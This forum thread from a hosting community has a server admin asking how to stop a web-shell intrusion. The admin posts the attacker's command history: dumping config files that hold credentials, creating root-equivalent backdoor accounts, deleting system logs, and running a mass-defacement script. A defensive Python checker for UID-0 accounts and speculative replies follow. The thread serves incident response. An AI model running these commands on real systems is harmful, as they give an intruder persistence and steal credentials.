The Community Forums


How to disable Perl Web Shell

Discussion in 'Security' started by konrath, Sep 20, 2009.

  1. konrath

    konrath Well-Known Member

    Joined:
    May 3, 2005
    Messages:
    367
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brasil
    A hacker changed the index of all sites on my server. :eek:

    How do I block this attack?

    How to increase the security of Perl?

    Thank you
    Konrath



    -------------

    log

    cd ..
    cat /home/*/public_html/configuration.php > hard.txt
    useradd -o -u 0 sshdd
    /usr/sbin/useradd -o -u 0 sshdd
    passwd sshdd
    /usr/sbin/useradd -o -u 0 apachee
    passwd apachee
    /usr/sbin/useradd -o -u 0 apach
    passwd apach
    /etc/init.d/sshd restart
    /etc/init.d/sshd stop
    /etc/init.d/sshd start
    rm hard.txt
    cat /home/*/public_html/config.php > hard.txt
    ls -lia
    rm hard.txt
    cd ..
    cat /home/*/public_html/config.php > hard.txt
    rm hard.txt
    cat /home/*/public_html/configuration.php > hard.txt
    rm hard.txt
    cat /home/*/public_html/wp-config.php > hard.txt
    rm hard.txt
    ls -lia /etc
    ls /etc/valiases > hard.txt
    rm hard.txt
    ls -lia /etc/valiases > hard.txt
    ls -lia /
    rm -r var/log
    rm -r /var/log
    mkdir /var/log
    ls -lia
    crm user1
    rm user1.php
    cd cgi-bin
    ls -lia
    rm -r hard
    cd ..
    rm hard
    cd cgi-bin
    cd ..
    rm hard.txt
    cd cgi-bin
    ls -lia
    pwd
    perl mass.pl
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
     
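    The history above shows the attacker running `useradd -o -u 0` to create extra accounts (sshdd, apachee, apach) that share UID 0 with root. The following check, added here as an example and not part of the original thread, lists every passwd entry with UID 0 other than root so an admin can review and remove them; the sample passwd content is constructed to mirror those commands.

```python
#!/usr/bin/env python3
"""List accounts that share UID 0 with root (root-equivalent logins)."""
import sys


def uid0_accounts(passwd_text):
    """Return login names other than 'root' whose UID field is 0.

    Accepts the raw text of a passwd file. Malformed or comment lines are
    skipped; the UID is compared numerically so '00' also counts as 0.
    """
    hits = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a valid passwd record
        name, uid = fields[0], fields[2]
        try:
            if int(uid) == 0 and name != "root":
                hits.append(name)
        except ValueError:
            continue  # non-numeric UID field, ignore
    return hits


# Constructed sample: the three accounts the attacker's history created.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apj23:x:502:504::/home/apj23:/bin/bash
sshdd:x:0:0::/home/sshdd:/bin/bash
apachee:x:0:0::/home/apachee:/bin/bash
apach:x:0:0::/home/apach:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
"""


def main(path="/etc/passwd"):
    """Scan the given passwd file; fall back to the sample if unreadable."""
    try:
        with open(path) as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_PASSWD
    for name in uid0_accounts(text):
        print("UID 0 account besides root:", name)


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd")
```

Run it as `python3 check_uid0.py /etc/passwd`; the same logic applies to `/etc/shadow` line counts or `getent passwd` output if the file has been tampered with.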
  2. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    Your description sounds very much like a variation of the recent IFRAME attacks and may be the start of the problem ....

    In all likelihood, the original attack (keep reading) had nothing to do with your server; what was actually compromised was instead the home computer of a user who uses your server, not your server itself. The larger problem is that once on a server, other options and avenues of attack often become available, depending on the security measures in place or lacking and on which account was originally compromised, namely a regular user or one with higher privileges.

    There is a recent hacking method that has emerged out of China involving installing a trojan virus capable of key-logging and collecting password information for hosting web servers and bank accounts from home computers, and the initial access to the servers is done using the victim's own login with the information collected off their own home computers. This means that the files on your server are changed not necessarily from a vulnerability on your server but rather from a compromised login and password!

    That is as far as the good news goes unfortunately! :(

    The bad news is that the compromised home user may be YOU!

    If your home computer is the one that is compromised and the hackers obtained your root credentials, then you are in serious trouble, because they would have full unrestricted access to not just one account but the entire server, all hosting accounts, and system files!

    Even if it wasn't your computer that was compromised, if your server doesn't have proper security measures in place, you could still run into problems with the hackers being able to compromise the server once they gain access to a regular non-root user account from any user's home computer!

    I'll be perfectly frank with you on this one and this is my advice ...
    Helping people recover from hacking attacks is personally my primary area of expertise and experience and is something I take very seriously. Contact me if you need more assistance recovering as I can definitely do a lot to help you. ;)
     
    #2 Spiral, Sep 20, 2009
    Last edited: Sep 20, 2009
  3. alifazman

    alifazman Active Member

    Joined:
    Sep 27, 2010
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Malaysia
    Hi konrath.

    May I know how I can get log details such as you stated?

    :) thanks.
     
  4. ModServ

    ModServ Well-Known Member

    Joined:
    Oct 17, 2006
    Messages:
    332
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Egypt
    cPanel Access Level:
    Root Administrator
    This topic is from 2009, don't expect to get a reply :D

    But he may reply to you, as he was here 5 days ago :D

    I guess he got it by executing the command

    Code:
    history
     
  5. alifazman

    alifazman Active Member

    Joined:
    Sep 27, 2010
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Malaysia
    hahaha.. I didn't look at the timestamp.

    wooah. What an easy way... why didn't it cross my mind. I thought it was extracted from a log file. :D
     
  6. ModServ

    ModServ Well-Known Member

    Joined:
    Oct 17, 2006
    Messages:
    332
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Egypt
    cPanel Access Level:
    Root Administrator
    Never mind, it's ok, we always forget the easiest ways to reach our target and think it is a long hard way :D
     